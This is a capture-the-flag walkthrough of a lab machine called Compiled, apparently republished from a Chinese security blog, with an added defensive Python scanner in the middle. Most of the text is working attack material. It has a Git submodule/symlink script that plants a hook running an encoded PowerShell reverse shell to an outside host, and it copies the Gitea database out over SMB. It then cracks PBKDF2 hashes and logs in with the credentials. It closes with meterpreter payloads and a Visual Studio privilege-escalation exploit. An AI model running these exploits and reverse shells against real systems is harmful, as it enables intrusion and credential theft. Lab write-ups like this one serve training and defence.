Information Gathering
| IP Address | Opening Ports |
|---|---|
| 10.10.11.26 | TCP:3000,5000 |
```
$ nmap -p- 10.10.11.26 --min-rate 1000 -sC -sV -Pn
PORT     STATE SERVICE VERSION
5000/tcp open  upnp?
| fingerprint-strings:
|   GetRequest:
|     HTTP/1.1 200 OK
|     Server: Werkzeug/3.0.3 Python/3.12.3
|     Date: Thu, 07 Nov 2024 17:16:09 GMT
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 5234
|     Connection: close
|     <!DOCTYPE html>
|     <html lang="en">
|     <head>
|     <meta charset="UTF-8">
|     <meta name="viewport" content="width=device-width, initial-scale=1.0">
|     <title>Compiled - Code Compiling Services</title>
|     <!-- Bootstrap CSS -->
|     <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css">
|     <!-- Custom CSS -->
|     <style>
|     /* Add your custom CSS here */
|     body {
|     font-family: 'Ubuntu Mono', monospace;
|     background-color: #272822;
|     color: #ddd;
|     .jumbotron {
|     background-color: #1e1e1e;
|     color: #fff;
|     padding: 100px 20px;
|     margin-bottom: 0;
|     .services {
|   RTSPRequest:
|     <!DOCTYPE HTML>
|     <html lang="en">
|     <head>
|     <meta charset="utf-8">
|     <title>Error response</title>
|     </head>
|     <body>
|     <h1>Error response</h1>
|     <p>Error code: 400</p>
|     <p>Message: Bad request version ('RTSP/1.0').</p>
|     <p>Error code explanation: 400 - Bad request syntax or unsupported method.</p>
|     </body>
|_    </html>
5985/tcp open  http    Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
```
Git-RCE && Code Compile
http://10.10.11.26:3000/
http://10.10.11.26:5000/
http://10.10.11.26:3000/richard/Calculator
https://amalmurali.me/posts/git-rce/
Create two new repositories, repo1 and repo2.
```bash
#!/bin/bash
# Client-side git settings the PoC from the git-rce post linked above relies on.
git config --global protocol.file.allow always
git config --global core.symlinks true
git config --global init.defaultBranch main
rm -rf nothing
rm -rf toSeeHere
# repo1 carries the hook file that git runs after checkout.
git clone http://10.10.11.26:3000/test/repo1.git
cd repo1
mkdir -p y/hooks
cat >y/hooks/post-checkout <<EOF
#!bin/sh.exe
powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA2AC4ANwA1ACIALAAxADAAMAAzADIAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA
EOF
chmod +x y/hooks/post-checkout
git add y/hooks/post-checkout
git commit -m "post-checkout"
git push
cd ..
# repo2 references repo1 as submodule "x/y" at path A/modules/x and adds a
# symlink a -> .git; on a case-insensitive filesystem A/ and a/ collide, so the
# submodule's y/hooks directory ends up under .git/modules/x/y/hooks.
git clone http://10.10.11.26:3000/test/repo2.git
cd repo2
git submodule add --name x/y "http://10.10.11.26:3000/test/repo1.git" A/modules/x
git commit -m "add-submodule"
printf ".git" >dotgit.txt
git hash-object -w --stdin <dotgit.txt >dot-git.hash
# Index entry: mode 120000 (symlink) named "a" whose blob content is ".git"
printf "120000 %s 0\ta\n" "$(cat dot-git.hash)" >index.info
git update-index --index-info <index.info
git commit -m "add-symlink"
git push
```
```
$ ./rev.sh
```
http://10.10.11.26:5000/
Compile the code (submit repo2 to the compile service on port 5000, which clones it on the server).
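The clone script above needs three things that a legitimate repository should never contain together: a tracked symlink whose target is `.git`, a submodule whose path passes through that symlink (relying on a case-insensitive filesystem to fold `A/` onto `a/`), and an executable file under a `hooks/` directory. The scanner below is an added example, not part of the original writeup or of the linked PoC; it parses `git ls-files -s` output (a constructed sample with placeholder object ids is embedded) plus the symlink targets read from the corresponding blobs, and flags each pattern so a build service can refuse a repository before it recursively checks out submodules.

```python
import posixpath

# Constructed sample in `git ls-files -s` format (mode, object id, stage, path).
# Object ids are placeholders. The entries mirror the layout the script above
# builds: symlink a -> .git, submodule at A/modules/x and, taken from the
# submodule repository, the tracked executable y/hooks/post-checkout.
SAMPLE_LS_FILES = "\n".join(
    f"{mode} {'0' * 40} 0\t{path}"
    for mode, path in [
        ("100644", ".gitmodules"),
        ("120000", "a"),
        ("160000", "A/modules/x"),
        ("100755", "y/hooks/post-checkout"),
    ]
)
# Symlink targets, i.e. the contents of the 120000 blobs (constructed to match).
SAMPLE_SYMLINKS = {"a": ".git"}


def parse_ls_files(text):
    """Turn `git ls-files -s` output into (mode, path) tuples."""
    entries = []
    for line in text.splitlines():
        if not line.strip():
            continue
        meta, path = line.split("\t", 1)
        entries.append((meta.split()[0], path))
    return entries


def scan_index(entries, symlink_targets):
    """Return (reason, path) findings for the symlink/submodule hook-injection pattern."""
    # Names are compared case-insensitively: the trick depends on A/ and a/ colliding.
    symlink_names = {path.lower() for mode, path in entries if mode == "120000"}
    findings = []
    for mode, path in entries:
        parts = path.split("/")
        if mode == "120000":
            target = posixpath.normpath(symlink_targets.get(path, "."))
            if ".git" in target.split("/"):
                findings.append(("symlink-into-dot-git", path))
        elif mode == "160000" and any(
            "/".join(parts[:i]).lower() in symlink_names for i in range(1, len(parts))
        ):
            findings.append(("submodule-under-symlink", path))
        elif mode == "100755" and "hooks" in parts[:-1]:
            findings.append(("tracked-executable-hook", path))
    return findings


if __name__ == "__main__":
    for reason, path in scan_index(parse_ls_files(SAMPLE_LS_FILES), SAMPLE_SYMLINKS):
        print(f"{reason}: {path}")
```

On a real repository, feed it `git ls-files -s` output and the result of `git cat-file -p` for each 120000 entry.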
```
$ impacket-smbserver share /tmp/ -smb2support
```

```
PS C:\Users\Public\Downloads> cp 'C:\Program Files\Gitea\data\gitea.db' \\10.10.16.75\share
```
```python
import hashlib
import binascii


def derive_pbkdf2_key(candidate, salt, rounds=50000, key_length=50):
    """
    Derive a key based on PBKDF2-HMAC-SHA256 (50000 rounds, 50-byte key, as stored in gitea.db).
    """
    return hashlib.pbkdf2_hmac(
        'sha256',
        candidate.encode('utf-8'),
        salt,
        rounds,
        key_length
    )


def attempt_password_crack(wordlist_path, target_hash, salt_value, rounds=50000, key_length=50):
    """
    Attempt to match PBKDF2 hash using a wordlist file.
    """
    target_hash_bytes = binascii.unhexlify(target_hash)
    try:
        # errors='ignore': rockyou.txt contains lines that are not valid UTF-8
        with open(wordlist_path, 'r', encoding='utf-8', errors='ignore') as wordlist:
            for entry in wordlist:
                candidate_password = entry.rstrip('\r\n')
                derived_key = derive_pbkdf2_key(candidate_password, salt_value, rounds, key_length)
                if derived_key == target_hash_bytes:
                    print(f"Password match found: {candidate_password}")
                    return candidate_password
    except FileNotFoundError:
        print("Wordlist file not found. Please check the path.")
        return None
    print("No matching password found.")
    return None


salt_value = binascii.unhexlify('227d873cca89103cd83a976bdac52486')
target_hash = '97907280dc24fe517c43475bd218bfad56c25d4d11037d8b6da440efd4d691adfead40330b2aa6aaf1f33621d0d73228fc16'
wordlist_path = '/usr/share/wordlists/rockyou.txt'
attempt_password_crack(wordlist_path, target_hash, salt_value)
```
```
$ python3 dec.py
$ evil-winrm -i 10.10.11.26 -u 'emily' -p '12345678'
```
User.txt
209380d1c60e610f2cef026e0c237404
Privilege Escalation && Visual Studio 2019
https://github.com/Wh04m1001/CVE-2024-20656
```
$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.16.75 LPORT=4444 -f exe -o reverse_shell.exe
```

```
msfconsole
use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 10.10.16.75
set LPORT 4444
run
```
Search for VSDiagnostics.exe:

```
> dir C:\VSDiagnostics.exe /s /p
```

Replace the VSDiagnostics.exe path in the exploit source with the one found, and set the path of the payload to launch:

```c
CopyFile(L"C:\\Users\\Emily\\Downloads\\reverse_shell.exe", L"C:\\ProgramData\\Microsoft\\VisualStudio\\SetupWMI\\MofCompiler.exe", FALSE);
```

Compile the exploit and upload it.
https://github.com/antonioCoco/RunasCs
```
PS C:\Users\Emily\Downloads> cp \\10.10.16.75\share\RunasCs.exe .
PS C:\Users\Emily\Downloads> cp \\10.10.16.75\share\Expl.exe .
PS C:\Users\Emily\Downloads> copy \\10.10.16.75\share\reverse_shell.exe .
PS C:\Users\Emily\Downloads> ./RunasCs.exe emily 12345678 ./Expl.exe
```
Root.txt
4910be87423e9b471cc4945f1e5fed7f
Source: [Meachines] [Medium] Compiled Git-RCE + Visual Studio 2019 Privilege Escalation - FreeBuf
Originally published on the WeChat public account 船山信安: [Meachines] [Medium] Compiled Git-RCE + Visual Studio 2019 Privilege Escalation